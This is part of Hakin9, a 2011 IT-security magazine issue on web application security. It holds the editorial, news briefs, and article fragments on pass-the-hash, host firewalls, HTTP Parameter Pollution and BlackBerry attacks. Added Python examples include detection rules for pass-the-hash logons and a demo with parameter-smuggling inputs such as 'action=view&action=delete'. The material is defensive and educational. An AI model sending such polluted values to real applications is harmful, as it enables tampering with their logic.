07/2011 (43)
team
Editor in Chief: Ewa Dudzic
ewa.dudzic@hakin9.org
Managing Editor: Patrycja Przybylowicz
patrycja.przybylowicz@hakin9.org
Editorial Advisory Board: Donald Iverson, Michael Munt,
Jonathan Edwards, Elliott Bujan, Carlos Alberto Ayala
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@software.com.pl
Marketing Manager: Małgorzata Bocian
m.bocian@hakin9.org
Proofreaders: Donald Iverson, Michael Munt, Elliott Bujan, Bob
Folden, Steve Hodge
Top Betatesters: Ivan Burke, Aby Rao, John Webb, Brandon Dixon, Michal Stawieraj, John DeGennaro, Flemming Laugaard, Robert Arrison, Francisco Gomez Rodriguez
Special Thanks to the Beta testers and Proofreaders who helped
us with this issue. Without their assistance there would not be a
Hakin9 magazine.
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic
ewa.dudzic@software.com.pl
Production Director: Andrzej Kuca
andrzej.kuca@hakin9.org
Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
To create graphs and diagrams we used program
by
The editors use automatic system
Mathematical formulas created by Design Science MathType
DISCLAIMER!
The techniques described in our articles may only
be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.
Dear Readers,
The leading topic of this issue is Web Application Security. We have picked this topic because of the popularity of various web apps, which are an integral part of the daily life not only of IT experts, but also of common non-IT people. Hackers have a range of opportunities to perform attacks in this area. Even a quick search on the Internet provides a long list of vulnerabilities in popular web applications. These vulnerabilities are used to gain illegal access to web or database servers. The results are unpredictable, from a leakage of data to devastation. Software and web app developers concentrate their efforts on features and functionality. The security issues are very often neglected for various reasons, like the time schedule of the project, or lack of the knowledge that securing an application is an important part of a developer's job.
I recommend you read An overview of Web Application Security Issues written by Julian Evans. It's a great introduction and summary in one to this wide topic. The joint article HTTP Parameter Pollution Vulnerabilities in Web Applications is worth your attention for sure. It's a result of cooperation of three specialists from this field: Marco Balduzzi, Luca Carettoni and Stefano Di Paola. Inside, you will find two practical texts about web testing: Web Testing Using Active and Passive Scanners by Ric Messier and Web Applications: Testing and Securing Your Code by Joe Pezzino and Phil Rusek. In the defense section there is an article which links the current issue to the previous one, Web Applications: Access Control and Authorization Issues written by Nilesh Kumar. In the columns you can read the continuation of Matt Jonkman's article about Command and Control Channels, and a great, amusing story by Ali Al-Shemery, Mummies still walk among us! Read it, have fun and find out why attacking new systems with old techniques still works.
Starting with the August issue we are introducing two new columns. Some of you might know the names, but I would like it to be a surprise for the rest of the readers.
Now, I would like to announce the contest for Hakin9 readers. The prize is a Syngress book, Web Application Obfuscation. I encourage you to take part. The details of the contest you will find below.
CONTEST
As you all may have noticed, we have recently changed the formula of the magazine and we are no longer a free magazine generating its income from advertisers. We would like to offer our readers as much as we can for the subscription price. That is why we decided to announce the contest for the best ideas on how to improve the magazine and the website content to make it more attractive for the readers. Send us the list of your ideas with short descriptions for each of them. Just think what you would like to read about in Hakin9 magazine and what you would like to get for the subscription fee. Write it down and send it to us. The 3 best letters will be awarded with a hard copy of Web Application Obfuscation.
The list of your ideas should be delivered by the 21st of July to the following address: en@software.com.pl with the message titled: CONTEST 7/11.
The contest results will be published in the August issue.
Enjoy reading!
Patrycja Przybyłowicz
& Hakin9 team
PRACTICAL PROTECTION IT SECURITY MAGAZINE

CONTENTS
IN BRIEF
08 Latest News From the IT Security World
By Armando Romeo, eLearnSecurity and ID Theft Protect
STORIES
10 Mummies still walk among us!
By Ali Al-Shemery
Imagine all the great sources of information on the Internet today such as: news groups, blogs, websites and forums, and you still see networks, and websites being hacked and torn down using old hacking techniques. For God's sake, isn't that a walking mummy? The author in an amusing way describes why it is so important to keep the knowledge updated and why attacking new systems with old techniques still works. Read the true, didactic story, full of humor.
BASICS
14 Firestarter: Starter to your Firewall
By Mervyn Heng
The firewall is the first line of defense on the network perimeter and end points. Firewalls are the gatekeepers to facilitate the flow of necessary traffic to and from assets. The author in his article focuses on the best practices when setting up a host-based firewall on a Ubuntu 10.4 LTS laptop. He describes how host-based firewalls allow all traffic by default to offer users immediate access to networks and the Internet, and how network-based firewalls interestingly employ the opposite tactic, as their default rule is to deny all.
ATTACK
18 HTTP Parameter Pollution Vulnerabilities in Web Applications
By Marco Balduzzi, Luca Carettoni, Stefano Di Paola
Is your web application protected against HTTP Parameter Pollution? A new class of injection vulnerabilities allows attackers to compromise the logic of the application to perform client and server-side attacks. HPP can be detected and avoided. But how? This article discusses why and how applications may be vulnerable to HTTP Parameter Pollution. By analyzing different attack scenarios, the authors of this article introduce the HPP problem. They describe PAPAS, the system for the detection of HPP flaws, and conclude by giving the different countermeasures that conscious web designers may adopt to deal with this novel class of injection vulnerabilities.
26 Does your BlackBerry Smartphone have ears?
By Yury Chemerkin
The smartphone has become the most popular gadget all over the world. Undoubtedly, compactness, convenience and a PC's functional capabilities have been winning modern users' hearts. People may think that Internet surfing is safer with their favorite smartphone than on a PC and that the privacy loss risk is minimized; however, analytical statistics show the opposite. From this article we will find out why every BlackBerry is vulnerable to multiple network attacks and how the address book provides a spam-attack vector. The author also explains how deceptions may mislead BlackBerry users into compromising security and what makes DTMF signalling a possible covert channel.
DEFENSE
42 Web Testing Using Active and Passive Scanners
By Ric Messier
Website creation has become so simple that just about anyone can do it. This doesn't mean that everyone can do it well. There are so many frameworks and tools available to make dynamic sites easy to put up quickly. The author of this article shows how to scan systems using both an active and a passive Web proxy. He also explains the differences between active and passive scanning and points out the reasons why doing regular site scanning can't be overvalued.
46 Web Applications: Access Control and Authorization Issues
By Nilesh Kumar
This article is about different kinds of Access Control mechanisms and the issues with them in Web Applications. Where sufficient authorization checks are lacking, access controls may be abused by the logged-in user. The impact can be catastrophic. Improper access control handling may result in information leakage or, worse, unauthorized access to system components. The article helps to imagine what will happen if a normal user is able to access content meant only for a system administrator. The author describes a few scenarios where authorization checks are not performed correctly and shows what their impact could be.
52 Web Applications: Testing and Securing Your Code
By Joe Pezzino, Phil Rusek
With the high demand for applications and information, companies have made data readily and easily available. Web applications, to keep in touch with friends, download music, or order a new espresso machine, are used so commonly that you seldom think about how the information is presented to you. From this article you will find out how to test and secure your web applications. The authors will also share with you their knowledge of why the best practice against SQL Injection is to write code that uses stored procedures and prepared statements.
ID EXPERTS SAYS...
56 An overview of Web Application Security Issues
By Julian Evans
Web application security is very much in its infancy; some security experts believe this is going to be a major emerging area of technology. Nowadays web apps are more complex and are based on a client-server architecture. This architecture is evolving and we see web apps such as Google Apps acting as a word processor, storing the files and allowing you to download the file onto your PC. Facebook and the social web have also moved into Web apps, hence the recently coined phrase Web 3.0. This is the overview article in which the author points out the most current issues in the area of Web App security, such as: programming development, JavaScript API, AJAX programming, mobile security or Facebook app security and authentication.
EMERGING THREATS
60 Why are there So Many Command and Control Channels Part Two
By Matt Jonkman
In his last article Matt Jonkman wrote about Command and Control Channels, or CnCs. In this one he continues the topic of CnC channels and takes up the discussion of the individual categories. He also describes some up-to-date examples of many of these categories out of the Emerging Threats Sandnet.
CARTOONS
62 The Asylum
By Jim Gilbert
Jim's cartoons are non-figurative. The reason for this lies in his long search for how to combine words and graphics. As a result he started to draw cartoons. Specifically he is excited about The Asylum because of its minimal nature, minimal drawing, minimal words, minimal characters... maximum content.
In brief
Google powers new security tool: DOM Snitch
Google, in the past few years, has shown a good interest in secure coding related projects with its Gruyere, Skipfish and now the just released DOM Snitch. The tool, powered by Google Zurich, is aimed at helping developers uncover potential weak points in their JavaScript code. It is supposed to help with client-side vulnerable code that might lead to DOM-based XSS and other issues that might alter how the same-origin policy is supposed to work.
The tool, still in its alpha release, comes as a Chrome extension and promotes testing in place of debugging, giving developers the correct tool and a simple interface from which to spot weak points before bad hackers do.
Source: Armando Romeo, www.elearnsecurity.com
BSides, a continuing success
BSides are community powered conferences where the intimate and friendly environment makes it easy and enjoyable to stay with other fellow security enthusiasts, share ideas and learn something new.
The idea was born two years ago with the goal of giving space to talks that didn't find it in major hacking conferences. With time these community events are becoming the preferred choice for everyone willing to take part in the community without having to spend thousands of dollars for an entrance ticket. Attendance is indeed FREE.
June has offered two exceptional opportunities to European security enthusiasts: BSidesLondon and BSidesVienna. With the participation of high profile speakers the two events sold out really fast and have proved, if necessary, that this is going to be the way conversation is going to happen in the security community.
Source: Armando Romeo, www.elearnsecurity.com
European businesses preparing for tougher data breach rules
As a reaction to the latest Sony and Sega breaches, the European Union is going to approve laws that will force businesses in the Union to immediately inform customers of any serious data breach.
The proposal is an important change for the security and privacy landscape in Europe where companies, until now, could deal with data breaches internally without bearing the costs of brand damage and incident response handling.
The law, if approved in Autumn, might raise the cost per breached record in the Union. Since the TJX breach, businesses have learnt how most of the costs of each data breach lie in the customer support to be given once the breach is announced. With increased cost per record, businesses are expected to factor in a higher expense in security controls that should, at least in theory, prevent breaches from happening at all.
The new bill, proposed by European commissioner Viviane Reding, is a big step in the right direction, although laws without proper enforcement are just useless. Time will tell if this will turn into additional security for final consumers.
Source: Armando Romeo, www.elearnsecurity.com
Citibank wasn't hacked. It was ridiculed
We are all maybe tired of hearing stories and news about how this or that big corporation has been hacked, breached, exposed et cetera. However there's something in the Citibank data breach, which by the way exposed the information of over 200,000 customers, that is worth reporting.
While we are still used to trivial and decade-old vulnerabilities being exploited in large corporations, this time hackers (but really it could have been a 7-year-old kid) managed to harvest information in the most simple and straightforward way: changing the customer ID in the location bar of their web browser.
Even the most obvious reflected XSS becomes elite hacking in front of such a huge failure. However, what's to note is that the most obvious XSS can be detected by tools. This kind of logic flaw might not. Time for a serious application security related discussion at Citibank. Are they going to hire some QA (because there's really no need for a pentester here)?
Source: Armando Romeo, www.elearnsecurity.com
Lulzsec hacking crew says bon voyage
Lulzsec is the hacking crew that has hacked into major companies worldwide including Infraguard, CIA, Nato, US Senate, AOL, AT&T, Disney, Sony, Hackforums.net and many others.
Only 50 days after the first attack the crew has now announced that it is disbanding and quitting its activities, but not before giving the community the results of their last attack: a number of internal sensitive documents stolen from AOL and AT&T, the whole database of the famous hacking forum Hackforums.net and much other customer data from various sources.
The announcement was given on Twitter where the crew collected a quarter million followers in a few weeks.
STORIES
Mummies still walk among us!
Using a basic SQL Injection to knock out a reputed company's website is a walking mummy. Using an old ftp server with a remote buffer overflow exploit spread in the wild a long time ago is a walking mummy. Using a php application with basic security features either turned off, or not implemented is a walking mummy. Using a misconfigured web application server in a production environment is a walking mummy. Even easily bypassing a company's firewall using old techniques is a walking mummy. Well, as you can see, if we want to write a list of these mummies that walk among us, actually we'll find there are countless specimens!
Companies and their IT staff that get hacked by such old techniques or, as I called them, mummies, all have in common either lack of knowledge, or outdated information!
Wake up, your brain needs an update!
Yes my dear, if you want to compete, or at least not to wake up at a train station where the train has left you behind on the bench, you must update yourself! The ICT world is moving as fast as a train, and sometimes I even feel it faster. So, walking beside it will just make you look as if you're the turtle racing with a cheetah!
Enabling automatic updates for your systems to get the latest software or buying and deploying the latest network technology tools doesn't mean that you're safe, nor does it mean that you have everything working correctly! Some systems might fail to function in the way they were intended to if you update to the newest version. An example of that is an ASP.net web application that uses framework 2 and, after an update to framework 3, stopped functioning correctly. This is true if the IT personnel have no knowledge about how proper patch management is done, or how to update critical systems without breaking them!
Besides all that, buying the latest network security devices or tools and not knowing how or where to place them will lead to useless or near-zero benefit! This is also true if there is a lack of knowledge of how the network or these tools operate.
You don't have to be an expert in all fields to get a better secured system and network, but it's not bad to have a different flower from the same garden! This is much better than getting your system, network or, like we see these days, reputed websites knocked out with an old and basic hacking technique!
Huh! What was all this intro about?
A couple of months ago a friend of mine called me to help him convince and prove to his institute that his personal email account was stolen because of a breach or misuse of their network. He needed a person from outside the institute to prove that their system administrators don't know about the water that has gone beneath their toes! Before I went over there, I asked my friend about their environment, just general stuff, such as what and how
Mummies Still Walk Among Us!
Imagine all the great sources of information on the Internet today such as: news groups, blogs, websites and forums, and you still see networks, and websites being hacked and torn down using old hacking techniques. For God's sake, isn't that a walking mummy?
What you will learn
Why you need to keep your knowledge updated,
Why attacking new systems using old techniques still works,
How to perform the Pass-the-Hash attack.
What you should know
System Administration basics,
Familiarity with security tools such as: Metasploit, Psexec, gsecdump, msvctl, etc.
Have you ever run a vulnerability scanner, such as Nessus, NeXpose, etc.? If not, I highly encourage you to do so. You shall see how each vulnerability or misconfiguration is reported, and you will find very useful information on the proper way to patch or solve them. The guys who have created and are updating these tools have been a really great help to IT personnel.
To defend your network from such an attack, there are some points you need to take into consideration:
Isolate Sensitive Systems. As we saw, when we gained access to one system we were able to reach critical and sensitive systems.
Enforce Least User Access (LUA). Giving each user administration privileges on his/her machine can lead to big problems, as we saw in our case. The fewer privileges you give your users, the more control you have over the network, and it will help you mitigate lots of threats, not just Pass-the-Hash.
Limit Cached Credentials. If the system didn't cache the password hash of the domain administrator, we might not have been able to succeed with our attack like this.
There are lots of other techniques and ways to secure your system from Pass-the-Hash, such as Dual Authentication, using IDS/HIDS, or Smart Cards, etc.
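The three countermeasures above also translate into something a defender can watch for in the Windows Security log. The following is an added example, not code from the article: it runs a few hunting rules over constructed key=value renderings of Security event 4624 records (the field names are the real 4624 fields; the accounts, hosts and the tiering policy are made up for the example). The NTLM rule is the common "network logon, NTLM, no session key" heuristic, and the other two rules check the isolation and cached-credential points directly.

```python
"""Flagging pass-the-hash style logons in Windows Security event 4624 records.

Added illustration of the defender side of the attack described above; it is
not tooling from the article. The event lines are constructed key=value
renderings of real 4624 fields (Computer, TargetUserName, LogonType,
AuthenticationPackageName, LogonProcessName, KeyLength); account and host
names and the tiering policy are made up for the example.
"""
import shlex

# Constructed tiering policy: which accounts are sensitive and on which hosts
# they may be used at all ("isolate sensitive systems" / least user access).
PRIVILEGED_ACCOUNTS = {"da_admin"}
ADMIN_HOSTS = {"PAW-01", "DC-01"}

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    # ordinary Kerberos network logon by a standard user
    "EventID=4624 Computer=FS-01 TargetUserName=jsmith LogonType=3 "
    "AuthenticationPackageName=Kerberos LogonProcessName=Kerberos KeyLength=0",
    # ordinary interactive logon by a standard user on his own workstation
    "EventID=4624 Computer=WS-042 TargetUserName=jsmith LogonType=2 "
    "AuthenticationPackageName=Negotiate LogonProcessName=User32 KeyLength=0",
    # legitimate NTLM network logon: a 128-bit session key was negotiated
    "EventID=4624 Computer=FS-01 TargetUserName=jsmith LogonType=3 "
    "AuthenticationPackageName=NTLM LogonProcessName=NtLmSsp KeyLength=128",
    # NTLM network logon with no session key by a domain admin onto a workstation
    "EventID=4624 Computer=WS-042 TargetUserName=da_admin LogonType=3 "
    "AuthenticationPackageName=NTLM LogonProcessName=NtLmSsp KeyLength=0",
    # null-session noise that the NTLM rule has to ignore
    'EventID=4624 Computer=FS-01 TargetUserName="ANONYMOUS LOGON" LogonType=3 '
    "AuthenticationPackageName=NTLM LogonProcessName=NtLmSsp KeyLength=0",
    # domain admin logging on interactively to a workstation: after such a
    # session the workstation holds cached credential material for that
    # account, which is what the attack in the article relied on
    "EventID=4624 Computer=WS-042 TargetUserName=da_admin LogonType=2 "
    "AuthenticationPackageName=Negotiate LogonProcessName=User32 KeyLength=0",
]


def parse_event(line):
    """Turn one key=value line into a dict; shlex keeps quoted values intact."""
    return dict(token.split("=", 1) for token in shlex.split(line))


def is_pth_style_ntlm_logon(event):
    """Network NTLM logon that negotiated no session key (KeyLength 0).

    A widely used hunting heuristic for pass-the-hash. Some legacy clients
    produce the same pattern, so treat a hit as a lead to investigate."""
    return (
        event.get("EventID") == "4624"
        and event.get("LogonType") == "3"
        and event.get("AuthenticationPackageName") == "NTLM"
        and event.get("LogonProcessName") == "NtLmSsp"
        and event.get("KeyLength") == "0"
        and event.get("TargetUserName", "").upper() != "ANONYMOUS LOGON"
    )


def is_tier_violation(event):
    """A sensitive account used on a host outside the admin tier."""
    return (
        event.get("EventID") == "4624"
        and event.get("TargetUserName") in PRIVILEGED_ACCOUNTS
        and event.get("Computer") not in ADMIN_HOSTS
    )


def is_cached_credential_exposure(event):
    """Interactive (2) or RDP (10) logon of a sensitive account on a non-admin
    host: the kind of session that leaves cached credentials on the box."""
    return is_tier_violation(event) and event.get("LogonType") in {"2", "10"}


def analyze(lines):
    """Return (rule, account@host) findings for the given event lines."""
    findings = []
    for line in lines:
        event = parse_event(line)
        subject = f'{event["TargetUserName"]}@{event["Computer"]}'
        if is_pth_style_ntlm_logon(event):
            findings.append(("ntlm-no-session-key", subject))
        if is_cached_credential_exposure(event):
            findings.append(("cached-credential-exposure", subject))
        elif is_tier_violation(event):
            findings.append(("tier-violation", subject))
    return findings


if __name__ == "__main__":
    for rule, subject in analyze(SAMPLE_EVENTS):
        print(f"{rule:28} {subject}")
```

Only the domain admin's sessions on the workstation are reported; the standard user's NTLM logon passes because a session key was negotiated, and the anonymous logon is filtered out as noise. The tiering lists are the part to adapt to your own environment.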
Summary
When Neo in the Matrix was to face the Agents, he needed new tools and weapons, and that's where his mate Tank stepped in as a source of information which provided him with what he needed; exactly like the Kung-Fu techniques we all saw (wish I could have some of those)! The ICT world is just like that Matrix: it's evolving rapidly, and you need to cope with that. The Internet is a great source of information for all the people over the world to use and update themselves. So please wake up, and update yourself, because attacking new systems with old techniques is really a shame!
ALI AL-SHEMERY
The author has been working as a network security officer for different large companies for more than five years. His day to day activity is related to firewall auditing, IDS/IPS, and policy enforcement. He holds a Ph.D. degree and an M.Sc. degree in Computer Information Systems (CIS), and a B.Sc. degree in Computer Science. Throughout his working career he managed to gain a couple of well known technical certificates such as: ECSA, CEH, CNI, CLP10, CLA10, CLDA, IBM Certified Specialist System p Administration, Novell Linux Specialist, and RHCE.
BASICS
Firestarter: Starter to your Firewall
Firewalls are the gatekeepers to facilitate the flow of necessary traffic to and from assets.
Background
Why deploy firewalls if they do not prevent targeted attacks? The firewall is a mature technology that, when deployed correctly, is effective at protecting systems against reconnaissance (e.g. port scans) and worm propagation by hiding vulnerable services. A classic example was the havoc created by the Slammer worm in January 2003. The worm was devastating despite its diminutive payload of 376 bytes. Administrators were not aware of the risk they put their SQL Servers at by exposing port 1434 to the Internet until it was too late. Home users were also infected as they unknowingly had MSDE residing on their systems.
Besides supplying ingress control, firewalls also offer egress control. In the event that a system is compromised by a Trojan or backdoor, the Access Control List (ACL) will limit the effectiveness of the malware if the port used by it is not sanctioned by the firewall.
This article focuses on best practices when setting up a host-based firewall on a Ubuntu 10.4 LTS laptop but the principles discussed are relevant to securely protecting other Operating Systems (OSs) and networks as well. Host-based firewalls allow all traffic by default to offer users immediate access to networks and the
Firestarter: Starter to your Firewall
The firewall is the first line of defense on the network perimeter and end points. Firewalls are susceptible to targeted attacks (e.g. social engineering, application vulnerabilities) but they are still the foundation upon which access control is built.
What you will learn
Introduction to access control
Configuring a host-based firewall on Ubuntu
Troubleshooting Firestarter
What you should know
Network, system and application fundamentals
Familiarity with Ubuntu
Figure 1. Firestarter
Figure 2. Interface
Pidgin successfully connected to the MSN network and this was verified by the Active connections in the main console.
An alternative to viewing logs on the firewall would be checking the settings in Pidgin. It is revealed that port 1863 is used to connect to messenger.hotmail.com.
Error messages offer an obvious answer to what the issue is. An attempt to send an encrypted email in Gmail using S/MIME set off an error message. The message highlights that an attempt was made to connect to the server on port 465. Adding a firewall rule to allow outbound connections over port 465 resolved this issue.
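When the firewall's own log is the source of the answer, the blocked connections are easiest to read once they are grouped by destination and port. The following is an added example, not part of the article and not Firestarter code: it parses constructed kernel log lines in the generic iptables LOG format (the "Outbound" and "Inbound" words stand in for whatever log prefix the rule set uses, and the addresses are made up), counts the blocked outbound flows, and prints the narrowest iptables allow rule that would admit each one, pinned to destination, protocol and port. Treat every suggested rule as a candidate to review: a blocked flow is not automatically a wanted one.

```python
"""Summarising blocked outbound connections from iptables LOG lines.

Added example; not part of the article and not Firestarter's own code. The
log lines are constructed in the generic iptables LOG format: the "Outbound"
and "Inbound" words are an assumed log prefix, and the addresses are made up.
"""
import re
from collections import Counter

# Constructed sample of kernel log output (not captured from a real host).
SAMPLE_LOG = """\
Jul 12 10:01:03 laptop kernel: Outbound IN= OUT=eth0 SRC=192.168.1.10 DST=65.54.239.20 LEN=60 PROTO=TCP SPT=51234 DPT=1863 SYN
Jul 12 10:01:06 laptop kernel: Outbound IN= OUT=eth0 SRC=192.168.1.10 DST=65.54.239.20 LEN=60 PROTO=TCP SPT=51235 DPT=1863 SYN
Jul 12 10:02:41 laptop kernel: Outbound IN= OUT=eth0 SRC=192.168.1.10 DST=74.125.39.109 LEN=60 PROTO=TCP SPT=40011 DPT=465 SYN
Jul 12 10:03:15 laptop kernel: Inbound IN=eth0 OUT= SRC=192.168.1.55 DST=192.168.1.10 LEN=48 PROTO=TCP SPT=4412 DPT=445 SYN
Jul 12 10:03:50 laptop kernel: Outbound IN= OUT=eth0 SRC=192.168.1.10 DST=192.168.1.1 LEN=76 PROTO=UDP SPT=123 DPT=123
"""

FIELD_RE = re.compile(r"(\w+)=(\S*)")
LINE_RE = re.compile(r"kernel: (?P<prefix>\S+) (?P<rest>IN=.*)")


def parse_line(line):
    """Extract the KEY=VALUE fields of one iptables LOG line, or None."""
    match = LINE_RE.search(line)
    if not match:
        return None
    fields = dict(FIELD_RE.findall(match.group("rest")))
    fields["PREFIX"] = match.group("prefix")
    return fields


def blocked_outbound(log_text):
    """Count blocked outbound flows by (destination, protocol, destination port).

    A packet leaving the host has OUT set and IN empty; inbound drops are left
    out because they call for a different decision (usually: keep blocking)."""
    flows = Counter()
    for line in log_text.splitlines():
        fields = parse_line(line)
        if fields and fields.get("OUT") and not fields.get("IN"):
            flows[(fields["DST"], fields["PROTO"], fields.get("DPT", "-"))] += 1
    return flows


def suggest_allow_rules(flows):
    """Generic iptables equivalents of the narrowest rule that would admit each
    flow: pinned to destination host, protocol and port, never a blanket
    allow. Every line is a candidate to review, not a rule to apply blindly."""
    return [
        f"iptables -A OUTPUT -p {proto.lower()} -d {dst} --dport {dport} -j ACCEPT"
        for (dst, proto, dport), _ in flows.most_common()
    ]


if __name__ == "__main__":
    flows = blocked_outbound(SAMPLE_LOG)
    for (dst, proto, dport), count in flows.most_common():
        print(f"{count:3}x {proto} {dst}:{dport}")
    print("\n".join(suggest_allow_rules(flows)))
```

The two MSN attempts on port 1863 and the single SMTPS attempt on port 465 come out on top, which is the information the Pidgin and Gmail cases above needed; the inbound drop on port 445 is deliberately not turned into a rule.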
Conclusion
There has been debate regarding the relevance of firewalls in this day and age with the evolving threats that exist. Firewalls are not infallible but they remain a critical element of infrastructure security as they continue to be one of multiple components that must be in place for defense in depth. This tried and tested technology is effective in controlling access when:
1. It is the first security measure implemented in your networks and on your systems.
2. The principle of least privilege is applied and only necessary ports/protocols/services are permitted.
3. Access is limited to specific IP(s) where applicable.
4. Logging is enabled, because it assists in troubleshooting and investigations.
5. It is deployed in synergy with other mechanisms (e.g. VPN, 2FA) that secure access.
Host-based firewalls are bundled with OSs but it is shocking that they are neglected by organisations and individuals for access control.
MERVYN HENG
Mervyn Heng, CISSP, loves Information Security and
Open Source. These interests are translated into his life in
Singapore where he practises the 2 philosophies and attempts
to transfer these passions to his friends through awareness.
If you have any comments or queries, please contact him at
commandrine@gmail.com.
ATTACK
HTTP Parameter Pollution
In the last twenty years, web applications have grown from simple, static pages to complex, full-fledged dynamic applications. Web applications can accept and process hundreds of different HTTP parameters to be able to provide users with rich, interactive services. As a result, dynamic web applications may contain a wide range of input validation vulnerabilities such as Cross-Site Scripting (XSS) and SQL injection (SQLi). According to the OWASP Testing Guide v3, "The most common web application security weakness is the failure to properly validate input coming from the client or environment before using it. This weakness leads to almost all of the major vulnerabilities in web applications [...]". Several kinds of injection flaws exist and they are usually strictly related to the specific metalanguage used by the subsystems: XML Injection, SQL Injection, LDAP Injection, etc. Each application layer uses a specific set of technologies and a characteristic contextual language.
In 2009, Luca Carettoni and Stefano di Paola introduced a new class of web vulnerabilities called HTTP Parameter Pollution (HPP) that permits injecting new parameters into an existing HTTP parameter. Later, in 2010, Marco Balduzzi of the International Secure Systems Lab at EURECOM investigated the problem and developed a system, called PAPAS, to detect HPP flaws in an automated way. He used PAPAS to conduct a large-scale study on popular websites and discovered that many real web applications are affected by HPP flaws at different levels.
This article discusses why and how applications may be vulnerable to HTTP Parameter Pollution. By analyzing different attack scenarios, we introduce the HPP problem. We then describe PAPAS, the system for the detection of HPP flaws, and we conclude by giving the different countermeasures that conscious web designers may adopt to deal with this novel class of injection vulnerabilities.
Parameter Precedence
In the context of websites, when the user's browser wants to transfer information to the web application (e.g. a server-side script), the transmission can be performed in three different ways. The HTTP protocol allows input to be provided inside the URI query string (GET parameters), in the HTTP headers (e.g. within the Cookie field), or inside the request body (POST parameters). The adopted technique depends on the application and on the type and amount of data that has to be transferred.
This standard mechanism for passing parameters is straightforward; however, the way in which the query string is processed to extract the single values depends on the application, the technology, and the development language that is used.
The problem arises when a developer expects to receive a single parameter and, therefore, invokes methods (such as Request.getParameter in JSP) that only return a single value. In this case, if more than one parameter with the
HTTP Parameter Pollution Vulnerabilities in Web Applications
Is your web application protected against HTTP Parameter Pollution? A new class of injection vulnerabilities allows attackers to compromise the logic of the application to perform client and server-side attacks. HPP can be detected and avoided. But how?
What you will learn
what is HTTP Parameter Pollution (HPP)
how to spot HPP flaws in web applications
how to prevent HPP in web development
What you should know
basic understanding of web technologies and languages
web security knowledge is a plus
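The precedence behaviour that the Parameter Precedence section describes is easy to see in code. The following is an added example, not code from the article and not part of PAPAS: it resolves a duplicated parameter under the three policies documented for common platforms (first occurrence for Java servlets, last occurrence for PHP, comma-joined values for ASP.NET), then shows the two defensive habits that stop HPP at the source: an accessor that refuses a parameter supplied more than once, and proper encoding when user input is placed into a URL. The query strings and the /item URL are constructed.

```python
"""Duplicate-parameter precedence, the root of HTTP Parameter Pollution.

Added example, not code from the article or from the PAPAS system. The
precedence policies reflect the documented behaviour of the named platforms
(first occurrence for Java servlets, last for PHP, comma-joined for ASP.NET);
the query strings and the /item URL are constructed for the example.
"""
from urllib.parse import parse_qs, urlencode


def resolve(query, name, policy):
    """Value that 'give me one parameter' code sees under a given policy."""
    values = parse_qs(query, keep_blank_values=True).get(name, [])
    if not values:
        return None
    if policy == "first":      # e.g. Java servlets (getParameter)
        return values[0]
    if policy == "last":       # e.g. PHP ($_GET)
        return values[-1]
    if policy == "concat":     # e.g. ASP.NET (Request.QueryString)
        return ",".join(values)
    raise ValueError(f"unknown policy {policy!r}")


def get_single(query, name):
    """Strict accessor: a parameter the application expects exactly once is
    rejected when it shows up more than once, instead of being guessed at."""
    values = parse_qs(query, keep_blank_values=True).get(name, [])
    if len(values) > 1:
        raise ValueError(f"parameter {name!r} supplied {len(values)} times")
    return values[0] if values else None


def build_link(base, **params):
    """Build a URL from user-controlled values; urlencode() percent-encodes
    '&' and '=', so a value cannot smuggle an extra parameter into the link."""
    return f"{base}?{urlencode(params)}"


if __name__ == "__main__":
    polluted = "action=view&action=delete"
    for policy in ("first", "last", "concat"):
        print(f"{policy:6} -> {resolve(polluted, 'action', policy)!r}")
    # A front-end check that reads the first value and a back-end that reads
    # the last one disagree about what this request does; the strict accessor
    # refuses to answer at all.
    try:
        get_single(polluted, "action")
    except ValueError as err:
        print("strict:", err)
    print(build_link("/item", id="1&action=delete"))
```

The first two functions are where a layered deployment goes wrong: a filter and a back-end that apply different policies see different requests. The strict accessor removes the ambiguity, and build_link shows that the same encoding discipline that prevents XSS in HTML also prevents a value from turning into a second parameter inside a URL.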
ATTACK
Does your BlackBerry smartphone have ears?
The smartphone has become the most popular gadget all over the world. Undoubtedly, compactness, convenience and a PC's functional capabilities have been winning modern users' hearts. People may think that Internet surfing is safer with their favorite smartphone than on a PC and that the privacy loss risk is minimized; however, analytical statistics show the opposite.
The most popular doesn't mean the most protected. Users who have purchased their devices tend to forget about it because they rely on password protection. Is the iPhone or Android protected? Nope. BlackBerry users have a superior method of protection: a password and an encrypted file system based on ECC algorithms. Is that really the case? In my second article in the February 2011 issue, Is Data Secure on the Password Protected Blackberry Device?, I detailed how to steal the password from a device, and in further articles I'm going to improve this method.
Statistics show that more than 90% of fashionable gadget owners (like iPhone) store personal information (photos, mail or contacts) without any device
Does your BlackBerry smartphone have ears?
This saying may come from a story about Dionysius of Syracuse (430-367 BC), who had an ear-shaped cave cut that connected the rooms of his palace so that he could hear what was being said from another room. Similar listening posts were installed in other palaces over the centuries, including the Louvre in Paris.
What you will learn
Every BlackBerry is vulnerable to multiple network attacks
Address book provides a spam-attack vector
Every BlackBerry Voice Notes Recorder can endanger security
DTMF signalling is a possible covert channel
Deceptions may mislead BlackBerry users into compromising security
What you should know
Basic knowledge about BlackBerry security
Figure 1. Encryption Feature
Figure 2. Up-to-date BlackBerry Contact
DEFENCE
Web Testing Using Active and Passive Scanners
In addition, anyone can quickly put up a LAMP server to provide database storage to go with those dynamic sites. There are a lot of pitfalls in creating sites in a way that doesn't easily give up data unnecessarily. Testing your sites and applications will protect you and your customers or users, but without appropriate tools that testing takes skill, diligence and patience. There are a number of tools available for the job, and the commercial varieties will cost you in the tens of thousands or more, depending on the size and scale of your testing endeavors. Fortunately, there are cheaper ways to accomplish the same task with more than reasonable results.
Active or Passive?
